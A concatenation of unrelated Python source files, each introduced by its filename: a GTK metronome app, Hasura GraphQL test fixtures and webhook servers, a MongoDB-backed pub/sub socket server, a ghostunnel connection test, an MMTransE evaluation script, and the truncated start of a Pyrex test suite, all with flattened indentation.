grid.attach(self.toggle_start, 1, 0, 1, 1)
self.box2.pack_end(self.switch_x2, 1, 0, 0)
grid.attach(self.box2, 1, 1, 1, 1)
grid.attach(self.spin_bpm, 1, 2, 1, 1)
self.box4.pack_end(self.switch_mt, 1, 0, 0)
grid.attach(self.box4, 1, 3, 1, 1)
grid.attach(self.button_beat, 0, 4, 2, 1)
self.connect("delete-event", self.on_delete)
if has_pyaudio:
self.switch_mt.set_sensitive(True)
self.metronome = Metronome()
self.switch_mt.connect("notify::active", self.on_metronome_activated)
self.tempox = 1
self.lastbpm = 0
self.reset_state()
def reset_state(self):
self.intervals = collections.deque(maxlen=20)
self.lastbeat = 0
self.invalidbeats = 0
self.stabletimes = 0
def on_switch_activated(self, switch, gparam):
if self.switch_x2.get_active():
self.tempox = 2
self.adj_spin.set_value(self.adj_spin.get_value() * 2)
else:
self.tempox = 1
self.adj_spin.set_value(self.adj_spin.get_value() // 2)
def on_spin_changed(self, adjustment):
if has_pyaudio and self.switch_mt.get_active():
self.metronome.interval = 60 / self.adj_spin.get_value()
def on_metronome_activated(self, switch, gparam):
if self.switch_mt.get_active():
self.metronome.start(60 / self.adj_spin.get_value())
else:
self.metronome.stop()
def on_button_toggled(self, button):
if button.get_active():
state = "on"
self.switch_mt.set_active(False)
self.switch_mt.set_sensitive(False)
self.button_beat.set_sensitive(True)
self.button_beat.grab_focus()
else:
state = "off"
self.button_beat.set_sensitive(False)
if has_pyaudio:
self.switch_mt.set_sensitive(True)
self.reset_state()
def on_beat(self, button):
if self.invalidbeats > 4:
now = time.time()
self.intervals.append(now - self.lastbeat)
self.lastbeat = now
bpm = round(60 * len(self.intervals) * self.tempox / sum(self.intervals))
self.adj_spin.set_value(bpm)
if self.lastbpm == bpm:
self.stabletimes += 1
if self.stabletimes > 5:
self.toggle_start.set_active(False)
else:
self.stabletimes = 0
self.lastbpm = bpm
else:
self.lastbeat = time.time()
self.invalidbeats = self.invalidbeats + 1
def on_delete(self, widget, event):
if has_pyaudio:
self.metronome.close()
Gtk.main_quit()
class Metronome:
def __init__(self):
with open(os.path.join(os.path.dirname(__file__), 'click.wav'), 'rb') as f:
self.wave = io.BytesIO(f.read())
self.wf = wave.open(self.wave, 'rb')
self.pa = pyaudio.PyAudio()
self.start_time = 0
self.closing = False
self.interval = 0
self.sleep = time.sleep
self.thread = None
def tick(self):
def callback(in_data, frame_count, time_info, status):
data = self.wf.readframes(frame_count)
return (data, pyaudio.paContinue)
self.wf.rewind()
stream = self.pa.open(
format=self.pa.get_format_from_width(self.wf.getsampwidth()),
channels=self.wf.getnchannels(),
rate=self.wf.getframerate(),
output=True,
stream_callback=callback
)
stream.start_stream()
while stream.is_active() and self.start_time:
self.sleep(0.05)
stream.stop_stream()
stream.close()
def start(self, interval):
self.interval = interval
self.thread = threading.Thread(target=self.background)
self.thread.start()
def background(self):
self.start_time = time.monotonic()
while self.start_time:
self.tick()
self.sleep_interval(self.interval)
def sleep_interval(self, interval):
now = time.monotonic()
preset = now + interval - ((now - self.start_time) % interval)
while self.start_time:
delta = preset - time.monotonic()
if delta <= 0:
return
elif delta >= 0.05:
time.sleep(delta/2)
def stop(self):
self.start_time = 0
def close(self):
self.stop()
self.sleep(0.01)
self.pa.terminate()
if __name__ == '__main__':
win = GridWindow()
win.show_all()
Gtk.main()
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
#Do init If headers are provided
self.init(headers)
elif not self.init_done:
self.init()
if query_id == None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'stop':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
if not query_id in self.ws_id_query_queues:
self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
#Put event in the correponding query_queue
self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
#Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-user-timeout":
time.sleep(3)
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
for input in inputs:
email_address = input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
def get_users_by_email(self, singleUser = False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
query = {
'query': gql_query,
'variables':{
'email':email
}
}
code,resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
def check_email(self, email):
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
return re.search(regex,email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
# This endpoint just sleeps for 2 seconds:
elif req_path == "/sleep_2s":
time.sleep(2)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
# This is like a sleep endpoint above, but allowing us to decide
# externally when the webhook can return, with unblock()
elif req_path == "/block":
if not self.server.unblocked:
self.server.blocked_count += 1
with self.server.unblocked_wait:
# We expect this timeout never to be reached, but if
# something goes wrong the main thread will block forever:
self.server.unblocked_wait.wait(timeout=60)
self.server.blocked_count -= 1
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
# Data received from hasura by our web hook, pushed after it returns to the client:
self.resp_queue = queue.Queue()
# We use these two vars to coordinate unblocking in the /block route
self.unblocked = False
self.unblocked_wait = threading.Condition()
# ...and this for bookkeeping open blocked requests; this becomes
# meaningless after the first call to unblock()
self.blocked_count = 0
super().__init__(server_address, EvtsWebhookHandler)
# Unblock all webhook requests to /block. Idempotent.
def unblock(self):
self.unblocked = True
with self.unblocked_wait:
# NOTE: this only affects currently wait()-ing threads, future
# wait()s will block again (hence the simple self.unblocked flag)
self.unblocked_wait.notify_all()
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def is_queue_empty(self):
return self.resp_queue.empty
def teardown(self):
self.evt_trggr_httpd.shutdown()
self.evt_trggr_httpd.server_close()
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.evt_trggr_web_server.join()
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.function_permissions = config.getoption('--test-function-permissions')
# This will be GC'd, but we also explicitly dispose() in teardown()
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.inherited_roles_tests = config.getoption('--test-inherited-roles')
self.pro_tests = config.getoption('--pro-tests')
self.ws_client = GQLWsClient(self, '/v1/graphql')
self.ws_client_v1alpha1 = GQLWsClient(self, '/v1alpha1/graphql')
self.ws_client_relay = GQLWsClient(self, '/v1beta1/relay')
self.backend = config.getoption('--backend')
self.default_backend = 'postgres'
self.is_default_backend = self.backend == self.default_backend
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if self.is_default_backend and not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v2q_f("queries/" + self.backend_suffix("clear_db")+ ".yaml")
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
if self.is_default_backend:
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h, b = None, v = None):
resp = None
if v == 'GET':
resp = self.http.get(
self.hge_url + u,
headers=h
)
elif v == 'POST' and b:
# TODO: Figure out why the requests are failing with a byte object passed in as `data`
resp = self.http.post(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PATCH' and b:
resp = self.http.patch(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PUT' and b:
resp = self.http.put(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'DELETE':
resp = self.http.delete(
self.hge_url + u,
headers=h
)
else:
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def execute_query(self, q, url_path, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + url_path,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q(self, q, headers = {}):
return self.execute_query(q, "/v1/query", headers)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def v2q(self, q, headers = {}):
return self.execute_query(q, "/v2/query", headers)
def v2q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v2q(yml.load(f))
def backend_suffix(self, filename):
if self.is_default_backend:
return filename
else:
return filename + "_" + self.backend
def v1metadataq(self, q, headers = {}):
return self.execute_query(q, "/v1/metadata", headers)
def v1metadataq_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1metadataq(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
# Close websockets:
self.ws_client.teardown()
self.ws_client_v1alpha1.teardown()
self.ws_client_relay.teardown()
def v1GraphqlExplain(self, q, hdrs=None):
headers = {}
if hdrs != None:
headers = hdrs
if self.hge_key != None:
headers['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(self.hge_url + '/v1/graphql/explain', json=q, headers=headers)
return resp.status_code, resp.json()
|
server.py
|
from re import A
import socket
from threading import Thread
from datetime import datetime
from pymongo import MongoClient
class Server:
def __init__(self, address: str, port: int, spacer:str=",", log:str=None, mongo:tuple=("", 0)):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((address, port))
self.sock.listen()
self.stop = False
self.mongo = True
try:
self.db = MongoClient(host=mongo[0], port=mongo[1]).degeerella
self.db.profiling_info()
except: self.mongo = False
self.version = "1.2"
self._log = log
self.connections = dict()
self.cCounter = 0
self.spacer = spacer.replace(" ", "")
self.subscriptions = dict()
self.subscriptionAlert = []
self.subscriptionRegistered = dict()
self.log(f"started | mongo: {self.mongo}")
def listen(self, thread=False):
if thread: Thread(target=self._listen, daemon=True).start()
else: self._listen()
def _listen(self):
while not self.stop:
try:
connection, address = self.sock.accept()
self.cCounter += 1
self.log(f"id {self.cCounter} connected : {address[0]}")
self.connections[self.cCounter] = connection
self.subscriptions[self.cCounter] = []
Thread(target=self.interact, daemon=True, args=(address, self.cCounter)).start()
except KeyboardInterrupt: break
def interact(self, address, id):
connection = self.connections[id]
self.sendInfos(id)
try:
while not self.stop:
data = connection.recv(1024)
if not data: break
self.log(f"received '{data.decode()}' from id {id}")
if data == b"disconnect": break
self.process(data.decode(), id)
except KeyboardInterrupt: pass
except ConnectionResetError: pass
except ConnectionAbortedError: pass
finally:
connection.close()
self.log(f"id {id} disconnected : {address[0]}")
del self.connections[id]
del self.subscriptions[id]
for i in self.subscriptionAlert: i(self.subscriptions)
def sendInfos(self, id): self.send(id, f"version:{self.version}: spacer:{self.spacer}: id:{id}:")
def process(self, data: str, id: int):
command = data.strip().split(" ")[0]
args = data.strip().split(" ")[1:]
commands = {
"subscribe": self.subscribe,
"emit": self.emit,
"save": self.save,
"get": self.get
}
if command in commands.keys():
if not commands[command](id, args): self.connections[id].send("error".encode())
else: self.connections[id].send("unkown".encode())
def save(self, id, args):
if not self.mongo: return False
if len(args) != 2: return False
keyword, value = args
if keyword.find(self.spacer) != -1: return False
value = value.replace(self.spacer, " ")
result = self.db.storage.find_one({"name": "keywordStorage"})
if not result:
self.db.storage.insert_one({"name": "keywordStorage", "keywords": dict()})
result = self.db.storage.find_one({"name": "keywordStorage"})
if value == "$delete":
try: del result["keywords"][keyword]
except: return False
else: result["keywords"][keyword] = value
self.db.storage.update_one({"_id":result["_id"]}, {"$set": {"keywords": result["keywords"]}})
return True
def get(self, id, args):
if not self.mongo: return False
if len(args) != 1: return False
keyword = args[0]
if keyword.find(self.spacer) != -1: return False
result = self.db.storage.find_one({"name": "keywordStorage"})
if not result:
self.db.storage.insert_one({"name": "keywordStorage", "keywords": dict()})
result = self.db.storage.find_one({"name": "keywordStorage"})
value = None
try: value = result["keywords"][keyword]
except: pass
self.send(id, f"query {keyword} {value.replace(' ', self.spacer) if value else 'error'}")
return True
def emit(self, _, args):
if len(args) < 2: return
topic = args[0]
data = self.spacer.join(args[1:])
sent = False
for i in self.subscriptions:
if topic in self.subscriptions[i]:
self.send(i, f":{topic} {data}")
sent = True
return sent
def subscribe(self, id, args):
if len(args) != 1: return
subscriptions: list = self.subscriptions[id]
if args[0] in subscriptions:
self.log(f"id {id} unsubbed from '{args[0]}'")
subscriptions.remove(args[0])
self.send(id, "0")
else:
self.log(f"id {id} subbed to '{args[0]}'")
subscriptions.append(args[0])
self.send(id, "1")
self.subscriptions[id] = subscriptions
for i in self.subscriptionAlert: i(self.subscriptions)
return True
def register(self, subscriptionName: str, func):
reg = self.subscriptionRegistered[subscriptionName]
if not reg: reg = []
reg.append(func)
def log(self, data):
data = data.replace("\n", " ")
data = f"{datetime.now().strftime('%a %d.%m. (%H:%M:%S)')} : {data}\n"
if self._log:
with open(self._log, "a+") as fp:
fp.write(data)
else: print(data[:-1])
def close(self):
self.stop = True
self.sock.close()
self.log("server closed")
def events(self, event, func):
if event == "subscription": self.subscriptionAlert.append(func)
def send(self, id: int, data:str): self.connections[id].send(data.encode())
|
test-client-concurrent-connections.py
|
#!/usr/bin/env python3
# Creates a ghostunnel. Ensures that multiple servers can communicate.
from subprocess import Popen
from multiprocessing import Process
from test_common import *
import socket, ssl, time, random
def send_data(i, p):
counter = 0
while counter < 100:
r = random.random()
if r < 0.4:
time.sleep(r)
continue
counter+=1
if r < 0.7:
p.validate_can_send_from_client("blah blah blah", "{0}:{1} client -> server".format(i, counter))
else:
p.validate_can_send_from_server("blah blah blah", "{0}:{1} server -> client".format(i, counter))
r = random.random()
if r < 0.5:
p.validate_closing_client_closes_server("{0} client close -> server close".format(i))
else:
p.validate_closing_server_closes_client("{0} server close -> client close".format(i))
if __name__ == "__main__":
ghostunnel = None
n_clients = 10
try:
# create certs
root = RootCert('root')
root.create_signed_cert('client')
for i in range(1, n_clients):
root.create_signed_cert("server{0}".format(i))
# start ghostunnel
ghostunnel = run_ghostunnel(['client', '--listen={0}:13001'.format(LOCALHOST),
'--target={0}:13002'.format(LOCALHOST), '--keystore=client.p12',
'--status={0}:{1}'.format(LOCALHOST, STATUS_PORT),
'--cacert=root.crt'])
# servers should be able to communicate all at the same time.
proc = []
for i in range(1, n_clients):
pair = SocketPair(TcpClient(13001), TlsServer("server{0}".format(i), 'root', 13002))
p = Process(target=send_data, args=(i,pair,))
p.start()
proc.append(p)
for p in proc:
p.join()
print_ok("OK")
finally:
terminate(ghostunnel)
|
test_MMTransE_lan_mapping_15k_fk.py
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../src/MMTransE'))
from MMTransE import MMTransE
import time
import multiprocessing
from multiprocessing import Process, Value, Lock, Manager, Array
import numpy as np
from numpy import linalg as LA
fmap = os.path.join(os.path.dirname(__file__), '../../data/WK3l-15k/en_fr/en2fr_fk.csv')
fmap2 = os.path.join(os.path.dirname(__file__), '../../data/WK3l-15k/en_fr/fr2en_fk.csv')
fmodel = os.path.join(os.path.dirname(__file__), '../../models/en_fr/model_MMtransE_person_15k.bin')
ofile1 = os.path.join(os.path.dirname(__file__), '../../results/P_test_en2fr_score_MM_15k.txt')
ofile4 = os.path.join(os.path.dirname(__file__), '../../results/P_test_fr2en_score_MM_15k.txt')
ef_map = {}
fe_map = {}
vocab_e = []
vocab_f = []
topK = 10
model = MMTransE()
model.load(fmodel)
def seem_hit(x, y):
for i in y:
if x.find(i) > -1 or i.find(x) > -1:
return True
return False
for line in open(fmap):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_e.append(line[0])
if ef_map.get(line[0]) == None:
ef_map[line[0]] = [line[1]]
else:
ef_map[line[0]].append(line[1])
for line in open(fmap2):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_f.append(line[0])
if fe_map.get(line[1]) == None:
fe_map[line[1]] = [line[0]]
else:
fe_map[line[1]].append(line[0])
print "Loaded en_fr fr_en mappings."
#en:...
manager = Manager()
lock1 = Lock()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
cpu_count = multiprocessing.cpu_count()
t0 = time.time()
def test(model, vocab, index, src_lan, tgt_lan, map, score, past_num):
while index.value < len(vocab):
id = index.value
index.value += 1
word = vocab[id]
if id % 100 == 0:
print id ,'/', len(vocab), ' time used ',time.time() - t0
print score
print rank.value
tgt = map.get(word)
cand = model.kNN_entity_name(word, src_lan, tgt_lan, topK)
cand = [x[0] for x in cand]
tmp_score = np.zeros(topK)
hit = False
last_i = 0
cur_rank = None
if tgt == None:
continue
for i in range(len(cand)):
last_i = i
tmp_cand = cand[i]
if hit == False and (seem_hit(tmp_cand, tgt) == True):
hit = True
if hit == True:
tmp_score[i] = 1.0
if cur_rank == None:
cur_rank = i
while last_i < topK:
if hit:
tmp_score[last_i] = 1.0
last_i += 1
if len(score) == 0:
score.append(tmp_score)
else:
with lock1:
score[0] = (score[0] * past_num.value + tmp_score) / (past_num.value + 1.0)
past_num.value += 1
if cur_rank != None:
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
continue
tmp_dist = 2
vec_t = None
vec_s = model.entity_transfer_vec(word, src_lan, tgt_lan)
for tmp_vec in tgt:
tmp_vec_t = model.entity_vec(tmp_vec, tgt_lan)
if tmp_vec_t is None:
continue
cur_dist = LA.norm(tmp_vec_t - vec_s)
if cur_dist < tmp_dist:
tmp_dist = cur_dist
vec_t = tmp_vec_t
if vec_t is None:
continue
cur_rank = model.entity_rank(vec_s, vec_t, tgt_lan)
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_e, index, 'en', 'fr', ef_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile1, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing en to fr'
#fr:...
manager = Manager()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_f, index, 'fr', 'en', fe_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile4, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print 'Finished testing fr to en'
|
test.py
|
#! /usr/bin/env python3
#
# Copyright 2019 Garmin Ltd. or its subsidiaries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import configparser
import grp
import os
import pwd
import re
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import unittest
PYREX_ROOT = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(PYREX_ROOT)
import pyrex
TEST_IMAGE_ENV_VAR = 'TEST_IMAGE'
class PyrexTest(unittest.TestCase):
def setUp(self):
self.build_dir = os.path.abspath(os.path.join(PYREX_ROOT, 'build'))
def cleanup_build():
if os.path.isdir(self.build_dir):
shutil.rmtree(self.build_dir)
cleanup_build()
os.makedirs(self.build_dir)
self.addCleanup(cleanup_build)
conf_dir = os.path.join(self.build_dir, 'conf')
os.makedirs(conf_dir)
self.pyrex_conf = os.path.join(conf_dir, 'pyrex.ini')
def cleanup_env():
os.environ = self.old_environ
# OE requires that "python" be python2, not python3
self.bin_dir = os.path.join(self.build_dir, 'bin')
self.old_environ = os.environ.copy()
os.makedirs(self.bin_dir)
os.symlink('/usr/bin/python2', os.path.join(self.bin_dir, 'python'))
os.environ['PATH'] = self.bin_dir + ':' + os.environ['PATH']
os.environ['PYREX_DOCKER_BUILD_QUIET'] = '0'
self.addCleanup(cleanup_env)
self.thread_dir = os.path.join(self.build_dir, "%d.%d" % (os.getpid(), threading.get_ident()))
os.makedirs(self.thread_dir)
self.test_image = os.environ.get(TEST_IMAGE_ENV_VAR)
if self.test_image:
conf = self.get_config()
conf['config']['dockerimage'] = self.test_image
conf.write_conf()
def get_config(self, defaults=False):
